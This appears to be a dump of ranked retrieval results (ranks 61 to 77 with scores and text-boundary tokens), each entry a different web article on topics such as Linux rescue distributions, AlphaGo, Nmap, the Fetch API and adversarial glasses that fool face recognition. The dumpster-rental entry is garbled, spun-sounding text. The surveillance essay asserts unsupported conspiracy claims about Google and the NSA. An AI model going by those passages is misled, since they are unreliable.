manipulate hard drives and partitions, monitor networks, rebuild boot records, install other operating systems, and much more. Finnix includes the latest technology for system administrators, with Linux kernel 3.0, x86 and PowerPC support, hundreds of sysadmin-geared packages, and much more. And above all, Finnix is small; currently the entire distribution is over 300MiB, but is dynamically compressed into a small bootable image. Finnix is not intended for the average desktop user, and does not include any desktops, productivity tools, or sound support, in order to keep distribution size low. + +New versions of Finnix are released every 3 months on average, with updated software from the Debian “testing” tree, along with new Finnix-specific functionality, the latest release it’s version 102 released on 23 July 2011. + +Features + +This is a list of packages and features available on release 102 + +Linux 3.0 as kernel + +Based on Debian testing (2011-07-21) + +Support to many file systems: ext3/4, btrfs, Macintosh HFS, cifs, JFS, NTFS, NTFS-3G and XFS + +Support to LVM and EVMS + +A lot of network tools: tcpdump, ethtool, snmp tools, wirelesstools + +A lot of other tools like wipe (to delete securely files) + +And if you need for a specific tool or program you can check the online package list + +GRML Grml is a bootable live system (Live-CD) based on Debian. Grml includes a collection of GNU/Linux software +================================================================================ +Rank = 61; Score = 3702784.0 +<|begin_of_text|>Image copyright Reuters Image caption Chinese Go player Ke Jie has lost two games to AlphaGo + +Google's DeepMind AlphaGo artificial intelligence has defeated the world's number one Go player Ke Jie. + +AlphaGo secured the victory after winning the second game in a three-part match. + +DeepMind founder Demis Hassabis said Ke Jie had played "perfectly" and "pushed AlphaGo right to the limit". + +Following the defeat, Ke Jie told reporters: "I'm a little bit sad, it's a bit of a regret because I think I played pretty well." + +Image copyright Reuters Image caption Ke Jie eventually resigned + +In Go, players take turns placing stones on a 19-by-19 grid, competing to take control of the most territory. + +It is considered to be one of the world's most complex games, and is much more challenging for computers than chess. + +Tea-making + +AlphaGo has built up its expertise by studying older matches and playing thousands of games against itself. + +The company says the eventual plan is to deploy its artificial intelligence "in areas of medicine and science". + +Prof Noel Sharkey, a computer scientist at Sheffield University, said it is still a long way from creating a general intelligence. + +"It is an incredible achievement and most experts thought an AI winning at Go was 20 years away so DeepMind is leading the field but this AI doesn't have general intelligence. It doesn't know that is playing a game and it can't make you a cup of tea afterwards." + +Prof Nello Cristianini, from Bristol University, added: "This is machine learning in action and it proves that machines are very capable but it is not general intelligence. No-one has built that yet." + +The types of intelligence exhibited by machines that are good at playing games are seen as very narrow. While they may produce algorithms that are useful in other fields, few think they are close to the all-purpose problem solving abilities of humans that can come up with good solutions to almost any problem they encounter. + +Prof Cristianini added that while competition at a gaming level is fine, it should not govern how we view our relationship with intelligent machines going forward. + +"We should focus on the good things that we can get out of them and be careful not to create situations in which we put ourselves in direct competition with machines." + +Both experts agreed that such algorithms could be adapted to other fields, such as health care. + +DeepMind has already begun working with the UK's national health service to develop apps and other tools for diagnosis.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 62; Score = 3702784.0 +<|begin_of_text|>An example of the "ghosting" one sees when looking through the Eidos glasses. Photo: Team Eidos The Eidos glasses allow wearers to see the ghostly trail of objects in motion, which has applications ranging from education to entertainment. Photo: Team Eidos Eidos brings a theatrical flair to the world of wearable computing. Photo: Team Eidos The Eidos face mask allows users to focus on and amplify a single audio signal. Photo: Team Eidos Despite originating at an art school, the Eidos products feature interesting technical ideas like conducting sound through bone. Photo: Team Eidos Early experiments were focused on functionality at the expense of aesthetics, but do hint at the mask's faceted appearance. Photo: Team Eidos The functionality of the Eidos system could be expanded by developing new apps and could be incorporated into other devices. Photo: Team Eidos + +Wearable computing is exploding. Google Glass has geeks atwitter, Oculus Rift is garnering great reviews from fanboys, and gadget blogs and Wall Street alike are waiting for another aluminum-clad icon to emerge from Apple HQ. However, innovation in this area isn't confined to billion-dollar companies or VC-funded startups A team of designers from the Royal College of Art are trying to put a new face on wearable computing—literally. + +Their creation, Eidos, is a pair of masks that use off-the-shelf sensors and custom software to augment the vision and hearing of their wearers, conferring superhero-ish powers in the process. Technology in the face mask lets users isolate and amplify audio signals of their choosing, the glasses display "ghosted" images of objects in motion, and the unique look of the products will irresistibly draw the attention of any passersby. + +>The glasses display "ghosted" images of objects in motion. + +The look of these devices has a distinct art school feel, but Team Eigos—comprised of Tim Bouckley, Millie Clive-Smith, Mi Eun Kim and Yuta Sugawara, sees killer apps for many different types of users. "The vision device gives a similar effect to long-exposure photography, revealing otherwise hidden traces of movement, but it does this live," says Clive-Smith. "This is remarkable at revealing patterns and allows you to pick out the details of motion you wouldn't normally realize." Coaches could use this technology to help players improve their form in real time rather than waiting until after a game to correct bad habits. Choreographers could start adding special effects to their performances +================================================================================ +Rank = 63; Score = 3670016.0 +<|begin_of_text|>Renting Dumpsters Posted on December 5, 2018 | By STEVE Whenever people have a task, it is easy to generate waste and piling up garbage can be a main source of worry. This is not only with regards to taking up space but also in conditions of polluting the environment unnecessarily. Therefore, how perform these worries are taken by you aside? This can be done by opting to use 20 yard dumpsters philadelphia simply. These are offered by local rental businesses and are designed to alleviate the worries of coping with trash from your brain. There are many of these rental companies in the marketplace and as such, it ought not to be difficult so that you can get the same. The local rental businesses will make sure that you recycle your waste in an eco-friendly method and at the same period, make the process easy. By using these eco-friendly dumpsters, you not really just ensure that your encircling is clean and gives you the ideal life-style but it will also make sure that you enjoy great wellness. As a result, this will give you great endurance and boost your probabilities of taking pleasure in a treatment free of charge way of living. These can be utilized in different fronts and places such as churches, house owners, areas and additional businesses. For this good reason, they are known to provide all round services to all these combined groups. There are instances when you might have dangerous waste products and this provides the ideal chance that you can ensure that you get rid of the same in a secure way. Dumpsters may end up being availed in various designs seeing that good as sizes and this makes it all easy for individuals to help to make buys based on their requirements. Another main benefit connected with this type of waste materials disposal is usually the truth that the consumer can place it in an area of their choice. This makes it simple to make sure that the clean up process is simple and effective on your part as well. It is normally essential to take note that the rental companies are also accountable for making sure that they are eliminated from your property once you are completed using the same and they can adhere to your time routine. What is more, in many situations, these ongoing companies will adhere to certain safety procedures when they are putting the same on site. At this true point, it is important to note that dumpsters that are provided by professional local rental businesses are also the perfect way to eliminate waste that is produced on building sites whether it is green backyard, commercial or home keep waste. What is usually even more, this provides you +================================================================================ +Rank = 64; Score = 3670016.0 +<|begin_of_text|>PYNQ is an open-source project that makes it easy for you to design embedded systems using the Xilinx Zynq-7000 SoC using the Python language, associated libraries, and the Jupyter Notebook, which is a pretty nice, collaborative learning and development environment for many programming languages including Python. PYNQ allows you to exploit the benefits of programmable logic used together with microprocessors to build more capable embedded systems with superior performance when performing embedded tasks such as: + +High frame-rate video processing + +Hardware-accelerated algorithms + +Real-time signal processing + +High-bandwidth I/O + +Low-latency control + +Nearly every embedded system needs to run one or more such tasks. The programmable hardware on the Zynq SoC just makes this job a lot easier. + +The PYNQ-Z1 based on the Xilinx Zynq Z-7020 SoC is the first dev board to support PYNQ and it just showed up on the Digilent Web site, listing for $229. (Digilent’s academic price for the PYNQ-Z1 is only $65!) + +Digilent PYNQ-Z1 Dev Board + +Here’s what’s on the PYNQ-Z1 board: + +Xilinx Zynq Z-7020 SoC with a dual-core ARM Cortex-A9 MPCore processor running at 650MHz + +512Mbytes of DDR3 SDRAM running at 1050MHz + +16Mbytes of Quad-SPI Flash memory + +A MicroSD slot for the PYNQ environment + +USB OTG host port + +USB programming port + +Gigabit Ethernet port + +Microphone + +Mono audio output jack + +HDMI input port + +HDMI output port + +Two Digilent PMOD ports + +Arduino-format header for Arduino shields + +Pushbuttons, switches, and LEDs + +That’s a lot of board for $229—and it’s pink! + +Here’s what PYNQ is, really: It’s for software developers and students who want to take advantage of the improved embedded performance made possible by the Zynq SoC’s programmable hardware without having to use ASIC-style (HDL) design tools to design hardware. + +For even better performance, you can also program the PYNQ-Z1 with C or C++ using the Xilinx SDK software development environment, available in the no-cost Xilinx Vivado HL Design Suite WebPACK. + +The PYNQ-Z1 and the PYNQ project make it possible to create a lot of really interesting systems, so just what are you waiting for? + + +================================================================================ +Rank = 65; Score = 3670016.0 +<|begin_of_text|>Campus-based technology courses can be expensive, which is why many people are choosing to take free technology courses online. Some of the best universities in the world offer free technology courses. Examples include Stanford University, the Massachusetts Institute of Technology and the Tokyo Institute of Technology. + +1. The Massachusetts Institute of Technology + +The Massachusetts Institute of Technology OpenCourseWare site is undoubtedly the best place to find free technology courses online. There are hundreds of courses to choose from, which means you can find a course on nearly any technology topic imaginable. + +2. Delft University of Technology + +The Delft University of Technology offers a number of free technology courses. Most of Delft's courses cover advanced topics that would be of interest to students in engineering or related fields. New courses are constantly being added to the site. + +3. University of California, Berkeley + +If you're looking for free technology courses that you can download to your MP3 player or computer, you'll definitely want to check out UC Berkeley on iTunes. Self-learners can gain access to a wide range of technology courses, lectures and events. Additional courses can be found though webcast.berkeley.edu. + +4. Stanford University + +Berkeley isn't the only university that makes free technology courses available through iTunes. Stanford University has a similar set-up through their Stanford iTunes project. There are quite a few technology courses and lectures that can be accessed for free already, and more are added on a weekly basis. + +5. Rice University + +Connexions, a Rice University organization, hosts a wide variety of scholarly content. The site offers hundreds of free technology courses. Some courses consist of small 'knowledge chunks.' Other courses include multiple modules, books and course notes. + +6. The Open University + +There are more than 50 free technology courses that can be taken through The Open University's online LearningSpace. Courses range from the introductory level to the advanced level and take anywhere from two hours to two weeks to complete. + +7. Utah State University + +Self-learners around the world can choose from more than a dozen free technology courses when they visit Utah State University's OpenCourseWare site. Technology topics include, but are not limited to: online communities, instructional technology, interactive learning and computer engineering. + +8. University of Southern Queensland + +The University of Southern Queensland offers two different courses that may be of interest to technology buffs. Both of the text-based courses are free and include materials that are practical for self-learners. + +9. Dixie State College of Utah + +The CIT Department at the +================================================================================ +Rank = 66; Score = 3620864.0 +<|begin_of_text|>More Info + +Windows 10 + +Microsoft Windows 10 combines the best elements of the Windows you already know, like the Start menu, with new features like space to pin your favorite apps and easy navigation so you'll feel right at home. Getting set up is faster and easier so you can get right to work or exploring the Windows App Store games or a new version of Office. InstantGo quickly boots up or resumes Windows while enhancements help balance memory and processor resources for maximum efficiency and Battery Saver automatically conserves power. Windows 10 also offers more built-in security features improving protection against viruses, phishing, and malware. + +Solid State Drive + +More reliable and significantly faster than traditional spinning-platter hardrives, solid state drives work more like a large flash drive giving you quick access to your data. With no moving parts generating heat, solid state drives use less power and keep your system cooler which helps reduce component failure. Light weight and durable, solid state drives are often found in portable devices since they are less prone to travel damage and accidents like being dropped. + +1TB Hard Drive + +A terabyte equals one trillion bytes. To put that in perspective, that's room enough for about 250,000 MP3 files, or according to Ron White, in his book, "How Computers Work", 20,000 four-drawer filing cabinets filled with text. In addition, this hard drive operates at a variable RPM which means you've got the best of both worlds, full speed for demanding loads and energy conservation during minimal access. + +Smart Cache + +With Intel Smart Cache you benefit from increased data access because the cache is shared between the cores from a single access point and optimized by workload demand. That means your system is making maximum use of its resources, enhancing multi-threading, and reducing storage redundancy. + +Intel® Quick Sync Video + +Built into every 2nd generation Intel Core™ processor, Quick Sync Video enables users to quickly create, edit, synchronize, and share video files from home or make them available online without the need for extra hardware. In addition, media conversion between devices takes just minutes thanks to hardware acceleration streamlining this process at incredible speed. That includes creating DVDs, Blu-ray™ discs, or editing and converting HD videos for portable media devices or uploading to your favorite social media sites. + +Intel InTrue™ 3D Technology + +The perfect way to watch 3D movies. InTrue 3D technology delivers 1080p, hi-def resolution 3D action to your TV using HDMI 1.4. With Blu +================================================================================ +Rank = 67; Score = 3604480.0 +<|begin_of_text|>Guidelines for a better Web User Experience + +Although a user’s experience on a website is largely subjective, there are several things you can do to ensure that visitors return to your site. + +A great user experience can result in increased customer loyalty, higher rates of conversion, and a decrease in abandon rates and customer service requests. It improves the quality of a user’s interactions with your products and services, and it enhances their perception of your organization. A good user experience will ensure that users find and recognize the value in what they are being offered and provided. + +To ensure that visitors get the best experience possible, it’s necessary to understand their needs and values, and the abilities and limitations your site gives them as users. You can learn this by working closely with your clients to gain a better understanding of their business environment. When you understand your client’s business, you can come to know what type of users your website or app should cater to. + +Very responsive, delivered what was asked of them. Great communication. I am happy that I picked AllianceTek! They produce. - Jason Corbin (Co-Founder) + +strApp in Apps, LLC + +New York, NY + +Call Christopher Dabhi at 484-892-5713 now to schedule your free consultation with AllianceTek. + +The design of your website is the most important factor to a user. A solid design incorporates the principles of human-computer interaction (HCI) and facilitates easy and intuitive user navigation by employing the– your website or app should provide iconic representation of its facets and use white space efficiently for readability and a comfortable aesthetic.The design should be. In an era where new devices and operating systems seem to be released every day, a single site with multiple capabilities to function on desktops, tablets, mobile phones, and other web-accessible devices is sorely needed. The most popular framework for developing responsive websites is Bootstrap.is also key to a good user experience. For a user to feel engaged, your website or app should feature calls to action, search prompts, and easy navigation. Interactivity can be enhanced through audio or video media, hover states, scroll events, and sliding interfaces.It’s also important to keep user clicks to a. You should cut down on tasks or actions required by users to create a simplified and streamlined experience that lets them find the content they need without spending excess time clicking through other pages to get there.that you provide on your website is also very important. A web page should not be verbose. Think of each page as a paragraph in an essay, where each section +================================================================================ +Rank = 68; Score = 3604480.0 +<|begin_of_text|>But more important for the students, the various A-Lab projects served as a concrete learning experience on what data science is all about, - how to leverage messy, incomplete, real-world data to shed light on a complex and not-so-well-defined problem. + +A-Lab received over 20 project proposals from different companies, of which 13 were selected by the students. Each project team was assigned a research mentor to provide guidance as appropriate. I mentored a 3-student team that worked on a project sponsored by MasterCard. The students explored the possibility of improving on predictions of the economic performance of emerging markets by coupling existing economic indicators data with consumer behavior based on MasterCard’s transaction data. This is a particularly interesting project because economic data in emerging markets is often not as reliable as the data in more advanced markets. + +This past semester I was involved in an interesting course at MIT’s Sloan School of Management, - Analytics Labs (A-Lab). A-Lab’s objective is to teach students how to use data sets and analytics to address real-world business problems. Companies submit project proposals prior to the start of the class, including the business problem to be addressed and the data on which the project will be based. Students are then matched with the project they’re most interested in and grouped into teams of 3-4 students. + +A-Lab is taught by professors Erik Brynjolfsson and Sinan Aral. The course was first given in 2014, so this is only its second year. The 2015 Syllabus offers a good overview of the class, including the various companies that submitted project proposals. + +Projects are considered confidential unless the companies involved give permission to talk about them publicly, + +as several did in 2014. + +Amazon, for example, sponsored a project on how to raise the share of wallet of Amazon Prime customers, based on the analysis of over 200 million anonymized data points. And IBM sponsored a project to uncover a potential Watson application. The students recommended using Watson as a kind-of regulatory analyst assistance, to help financial institutions better understand how to comply with the over 1700 pages of regulations in the Dodd-Frank legislation. + +The 2015 A-Lab class culminated with short presentations of each of the student projects before an audience that included company sponsors and mentors. As I listened to the 13 presentations, I was impressed by the potential of applying big data and analytics to all kinds of business problems, from the tactical decisions every business makes as part of its normal operations to the strategic +================================================================================ +Rank = 69; Score = 3588096.0 +<|begin_of_text|>Fetch is the native AJAX API to replace jQuery.get() + +As a term AJAX has been around for over a decade now. While many still relate to it as rich and fluid interfaces, the real deal is the possibility of making asynchronous requests to the server from the browser. + +As browsers evolved the XMLHttpRequest API used for AJAX did not not evolve. This is why many developers still rely on including the whole jQuery library just to abstract asynchronous HTTP Request. jQuery has a great and simple to use API for many things, but including it just for AJAX is overkill. + +Finally the Web API has a new native alternative available. This is known as the Fetch API and offers a very simple way of getting content from the server with JavaScript in the browser. The API is a high level one that has a generic definition of HTTP Request and Response objects. + +To anyone used to working with the HTTP, the concepts are immediately familiar: + +GlobalFetch : Contains the fetch() method used to fetch a resource. + +: Contains the fetch() method used to fetch a resource. Headers : Represents response/request headers, allowing you to query them and take different actions depending on the results. + +: Represents response/request headers, allowing you to query them and take different actions depending on the results. Request : Represents a resource request. + +: Represents a resource request. Response: Represents the response to a request. + +In addition to standard features developers would expect, the Fetch API definition handles closely related concepts such as CORS (Cross-origin resource sharing) and HTTP origin headers. The fetch resouce is available in the browser's standard window object and has only a single mandatory argument - the request URL. + +The fetch method returns a JavaScript promise that makes it convenient to work with the asynchronous nature of HTTP requests in the browser context. Once the response is received, there are a number of methods available in the object. + +Browser support for the Fetch API is very good with evergreen browsers such as Chrome, Edge, Firefox and Opera already supporting the feature. Internet Explorer does not support the API, but there is a fetch API polyfill that can be used for it.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 70; Score = 3555328.0 +<|begin_of_text|>“There will come a time when it isn't ‘They’re spying on me through my phone’ anymore. Eventually, it will be ‘My phone is spying on me.’” ― Philip K. Dick + +If ever Americans sell their birthright, it will be for the promise of expediency and comfort delivered by way of blazingly fast Internet, cell phone signals that never drop a call, thermostats that keep us at the perfect temperature without our having to raise a finger, and entertainment that can be simultaneously streamed to our TVs, tablets and cell phones. + +Likewise, if ever we find ourselves in bondage, we will have only ourselves to blame for having forged the chains through our own lassitude, laziness and abject reliance on internet-connected gadgets and gizmos that render us wholly irrelevant. + +Indeed, while most of us are consumed with our selfies and trying to keep up with what our so-called friends are posting on Facebook, the megacorporation Google has been busily partnering with the National Security Agency (NSA), the Pentagon, and other governmental agencies to develop a new “human” species, so to speak. + +In other words, Google—a neural network that approximates a global brain—is fusing with the human mind in a phenomenon that is called “singularity,” and they’ve hired transhumanist scientist Ray Kurzweil to do just that. Google will know the answer to your question before you have asked it, Kurzweil said. “ It will have read every email you will ever have written, every document, every idle thought you’ve ever tapped into a search-engine box. It will know you better than your intimate partner does. Better, perhaps, than even yourself.” + +But here’s the catch: the NSA and all other government agencies will also know you better than yourself. As William Binney, one of the highest-level whistleblowers to ever emerge from the NSA said, “ The ultimate goal of the NSA is total population control.” + +Science fiction, thus, has become fact. + +We’re fast approaching Philip K. Dick’s vision of the future as depicted in the film Minority Report. There, police agencies apprehend criminals before they can commit a crime, driverless cars populate the highways, and a person’s biometrics are constantly scanned and used to track their movements, target them for advertising, and keep them under perpetual surveillance. + +Cue the dawning of the Age of the Internet of Things, in which internet-connected “things” will monitor your home, your health and your habits +================================================================================ +Rank = 71; Score = 3555328.0 +<|begin_of_text|>Radical Servers + +Anti-capitalist, anti-hierarchy, autonomous, feminist, or radical server projects, revolutionary collectives which provide free or mutual aid services to radical and grassroots activists. + +Want to update your collective’s information or want to be listed here? Edit our repo. + +World Wide + +Hackerspaces are community-operated physical places, where people can meet and work on their projects. This website is for Anyone and Everyone who wants to share their hackerspace stories and questions with the global hackerspaces community. + +indymedia.org is a decentralized global network of media activists. + +News feeds + +Tachanka is the idea of providing technical services to emancipatory projects and groups of political change. It is also the groups of people behind this idea. There are many overlapping collectives that help to maintain the projects, but Tachanka operates within many shared principles, forming a supportive network to enable shared aims. The collectives are international, seeking to enhance global solidarity. The foremost guiding principles of the Tachanka project are the Hallmarks of People’s Global Action and the Debian Social Contract. + +Mailing lists + +Virtual servers + +DNS caching + +caching Drupal farms + +English / French / Portuguese language + +Take Back The Tech! + +Take Back The Tech! is a global campaign that connects the issue of violence against women and information and communications technology (ICT). It aims to raise awareness on the way violence against women is occurring on ICT platforms such as the Internet and mobile phones, and to call for people to use ICT in activism to end violence against women. It was initiated by the Association for Progressive Communications (apc.org), Women’s Networking Support Programme, in 2006. Since then, the campaign has been taken up and organised by individuals, collectives and non-governmental organizations in at least 24 countries. More at Wikipedia + +Telecentre + +Telecentre is a widely adopted concept to provide free access to the internet and other services at puplic spaces with computers and other digital technologies that enable them to gather information, create, learn, and communicate with others while they develop essential digital skills. Guidebook for Managing Telecentre Networks + +South America + +Codigosur + +Codigosur is a collective of activists from different social movements in Latin America for collaboration and the development of communication tools, culture and free technology + +Hosting + +Email + +Lists + +Mumble + +Streaming + +TLS + +Etherpad + +DNS and more + +Colnodo + +Colnodo is a Colombian non-profit organization that aims to facilitate communication and the exchange of information, experience, and +================================================================================ +Rank = 72; Score = 3489792.0 +<|begin_of_text|>network scanner + +Nmap (Network Mapper) is a free and open-source network scanner created by Gordon Lyon (also known by his pseudonym Fyodor Vaskovich).[3] Nmap is used to discover hosts and services on a computer network by sending packets and analyzing the responses. + +Nmap provides a number of features for probing computer networks, including host discovery and service and operating system detection. These features are extensible by scripts that provide more advanced service detection,[4] vulnerability detection,[4] and other features. Nmap can adapt to network conditions including latency and congestion during a scan. + +Nmap started as a Linux utility[5] and was ported to other systems including Windows, macOS, and BSD.[6] Linux is the most popular platform, followed by Windows.[7] + +Features [ edit ] + +Nmap features include: + +Host discovery – Identifying hosts on a network. For example, listing the hosts that respond to TCP and/or ICMP requests or have a particular port open. + +Port scanning – Enumerating the open ports on target hosts. + +Version detection – Interrogating network services on remote devices to determine application name and version number. [8] + +OS detection – Determining the operating system and hardware characteristics of network devices. + +Scriptable interaction with the target – using Nmap Scripting Engine[9] (NSE) and Lua programming language. + +Nmap can provide further information on targets, including reverse DNS names, device types, and MAC addresses.[10] + +Typical uses of Nmap: + +Auditing the security of a device or firewall by identifying the network connections which can be made to, or through it. [11] + +Identifying open ports on a target host in preparation for auditing. [12] + +Network inventory, network mapping, maintenance and asset management. + +Auditing the security of a network by identifying new servers. [13] + +Generating traffic to hosts on a network, response analysis and response time measurement. [14] + +Finding and exploiting vulnerabilities in a network. [15] + +DNS queries and subdomain search + +User interfaces [ edit ] + +NmapFE, originally written by Zach Smith, was Nmap's official GUI for Nmap versions 2.2 to 4.22.[16] For Nmap 4.50 (originally in the 4.22SOC development series) NmapFE was replaced with Zenmap, a new official graphical user interface based on UMIT, developed by Adriano Monteiro Marques. + +Various web-based interfaces allow controlling Nmap or analysing Nmap results from a +================================================================================ +Rank = 73; Score = 3489792.0 +<|begin_of_text|>Your face is quickly becoming a key to the digital world. Computers, phones, and even online stores are starting to use your face as a password. But new research from Carnegie Mellon University shows that facial recognition software is far from secure. + +In a paper (pdf) presented at a security conference on Oct. 28, researchers showed they could trick AI facial recognition systems into misidentifying faces—making someone caught on camera appear to be someone else, or even unrecognizable as human. With a special pair of eyeglass frames, the team forced commercial-grade facial recognition software into identifying the wrong person with up to 100% success rates. Researchers had the same success tricking software touted by Chinese e-commerce giant Alibaba for use in their “smile-to-pay” feature. + +Modern facial recognition software relies on deep neural networks, a flavor of artificial intelligence that learns patterns from thousands and millions of pieces of information. When shown millions of faces, the software learns the idea of a face, and how to tell different ones apart. + +Carnegie Mellon University Top images show the real person, and the bottom images show the identity chosen by facial recognition. + +As the software learns what a face looks like, it leans heavily on certain details—like the shape of the nose and eyebrows. The Carnegie Mellon glasses don’t just cover those facial features, but instead are printed with a pattern that is perceived by the computer as facial details of another person. + +In a test where researchers built a state-of-the-art facial recognition system, a white male test subject wearing the glasses appeared as actress Milla Jovovich with 87.87% accuracy. An Asian female wearing the glasses tricked the algorithm into seeing a Middle Eastern man with the same accuracy. Other notable figures whose faces were stolen include Carson Daly, Colin Powell, and John Malkovich. Researchers used about 40 images of each person to generate the glasses used to identify as them. + +The test wasn’t theoretical—the CMU printed out the glasses on glossy photo paper and wore them in front of a camera in a scenario meant to simulate accessing a building guarded by facial recognition. The glasses cost $.22 per pair to make. When researchers tested their glasses design against a commercial facial recognition system, Face++, who has corporate partners like Lenovo and Intel and is used by Alibaba for secure payments, they were able to generate glasses that successfully impersonated someone in 100% of tests. However, this was tested digitally—the researchers edited the glasses onto a picture, so in the real world the success rate could be less +================================================================================ +Rank = 74; Score = 3457024.0 +<|begin_of_text|>Contractors' All Risks (CAR) Insurance Definition + +What is 'Contractors' All Risks (CAR) Insurance' + +Contractors' All Risks (CAR) insurance is an insurance policy that provides coverage for both damage to a property and third-party injury or damage claims. + +Types of Risk in Construction Project + +Damage to the property + +Third-parties Damage + +Why Contractors' All Risks (CAR) Insurance + +Contractors' All Risks Insurance Coverage + +Tags: + +contractors liability insurance engineer insurance, engineering insurance, professional liability insurance cost, professional liability insurance, contractor insurance, contractor liability insurance, contractors all risk insurance, engineers insurance, insurance for engineers, professional engineer insurance, professional indemnity insurance, professional insurance, contractors insurance + +In other words Contractors' All Risks (CAR) insurance is a property insurance by which any building or civil engineering project under construction is protected against accidents which may lead to physical damage to or the destruction of works in progress or materials brought to the site.Contractors' all risk (CAR) insurance policies are considered non-standard insurance policies.Construction projects typically involve two primary types of risk: damage to the property, and third-party claims of injury or damage.Damage to the property could include the structure as a result of poor construction, or damage during a renovation.Third-parties, including injuries subtend by subcontractor while working in the engineering project site. Contractors' all risk (CAR) insurance bridges these two risks into a common policy, and helps cover the gap between exclusions that would otherwise exist when using separate policies.BREAKING DOWN 'Contractors' All Risks (CAR) Insurance' CAR insurance is typically taken out jointly by both the contractor and the employer, with other parties such as financing companies having the option of being named to the policy. Because multiple parties are included in the policy they each retain the right to file a claim against the insurer, although all parties also have the duty of informing the insurer of any injuries and damages that may result in a claim.Aim and objective of CAR insurance policy is to ensure the protection of all parties involves in a project, regardless of the type of damage to the property or who caused the damage. Insurers who underwrite this type of policy lose the right to subrogation, meaning that if it pays out funds to one party in the contract then it cannot seek to recover those funds from another party in the contract. For example, if the owner of a large building and the contractor working on the building are on the same CAR policy, any costs +================================================================================ +Rank = 75; Score = 3457024.0 +<|begin_of_text|>EDMONTON - Press "enter," dealer — scientists have taught a computer how to play unbeatable poker. + +While the news may sadden the hearts of rec-room card sharps everywhere, the winners in this game are programmers trying to do everything from improve public security to help doctors treat patients with diabetes. + +"We should be able to use these algorithms in any well-defined problem," said Michael Bowling, the University of Alberta computer scientist who co-authored a paper in the journal Science that details how the program for two-handed, fixed-bet Texas Hold 'Em can't do worse than break even. + +Scientists in the field of game theory long ago taught computers to play games such as checkers and chess. But poker has remained elusive because it's a so-called "imperfect information" game. A player has to make decisions without knowing all the data such as what the other player is holding. + +"This game has been, historically, an important challenge problem," Bowling said. "Poker is one of the games that really motivated the whole founding of the field of game theory back in the '20s." + +Bowling's team made its breakthrough by refining a previously developed technique called counterfactual regret minimization that allows a computer to look back at previous hands and learn from its mistakes. Although that sounds similar to how humans improve, the computer used here became a one-player Las Vegas. + +"It spent two months playing billions and billions of hands of poker against itself to find the perfect strategy," said Bowling. "The strategy is 1,000 times larger than all the English-language Wikipedia." + +It's unlikely to be of much use at anyone's Saturday night game. + +"You have to memorize a 10-terabyte table of probabilities." + +A terabyte is one byte followed by 12 zeros. + +But the point was never to become an unbeatable online poker star. The same process that taught the computer when to hold 'em and when to fold 'em can be transferred to any problem with well-defined rules and outcomes, many options and imperfect information — terrorist security, for example. + +"We run patrols, we do searches — we have these tools at our disposal, but how do we deploy them? We want to find a strategy that's unbeatable. + +"What we've done is shown that we can do these game theoretic analyses at a scale that hasn't been done before — at a really enormous complexity. That means that we can start looking at problems in that security sphere." + +Game theory is already being used to help schedule air marshals on commercial flights in the +================================================================================ +Rank = 76; Score = 3424256.0 +<|begin_of_text|>ARMONK, NY - 28 Aug 2012: IBM (NYSE: IBM) today announced the zEnterprise® EC12 mainframe server, the most powerful and technologically advanced version of an IBM system that has been the linchpin of enterprise computing for 48 years. The new enterprise system features technologies that demonstrate IBM’s ongoing commitment to meet the growing need to secure and manage critical information with the System z mainframe. + +Mainframes support significant portions of the data environment at most large enterprises. As these enterprises grapple with the well-documented growth of data, they are looking for new ways to secure and gain insights from such critical information as financial, customer and enterprise resource data that will enable them to provide their clients with new services. The new zEC12 offers industry-leading security and robust support for operational analytics that can help clients efficiently sift through large volumes of raw data and transform it to gain knowledge that can be used for competitive advantage. For example, a retailer managing online transactions on zEC12 can gain insights from client information that will enable it to provide clients with a more customized shopping experience. + +The IBM zEC12 enterprise system is the result of an investment by IBM Systems and Technology Group of more than $1 billion in IBM research and development primarily in Poughkeepsie, New York as well as 17 other IBM labs around the world and in collaboration with some of IBM's top clients. + +The new IBM mainframe is one of the most secure enterprise systems ever (1), with built-in security features designed to meet the security and compliance requirements of different industries. With operational analytics and near real-time workload monitoring and analysis, clients can use the new zEC12 for a variety of workloads, including hybrid clouds that can take advantage of the System's 25% more performance per core and 50% greater total system capacity than its predecessor as well as the world’s fastest chip running at 5.5 GHz (2). + +Ultimate Security for Critical Information + +IBM System z is a leading platform for secure data serving and the only commercial server to achieve Common Criteria Evaluation Assurance Level 5+ security classification, providing clients the confidence to run many different applications containing confidential data on a single mainframe. The new zEC12 builds on this with innovative security and privacy features to help protect data at rest or in flight -- a critical capability in the age of Internet banking and mobile devices. + +zEC12 includes a state-of-the-art, tamper-resistant cryptographic co-processor called Crypto Express4S that provides privacy for +================================================================================ +Rank = 77; Score = 3407872.0 +<|begin_of_text|>The first piece of software to show the potential of quantum computing has finally been run on a real machine, 20 years after it was initially dreamed up. Although it doesn’t do anything useful on its own, implementing the algorithm could lead to more practical computers powered by the strange properties of quantum mechanics. + +Quantum computers should be much faster than ordinary ones, but only at tasks for which there is a quantum algorithm – software that takes advantage of the computer’s quantum nature. Without these algorithms, 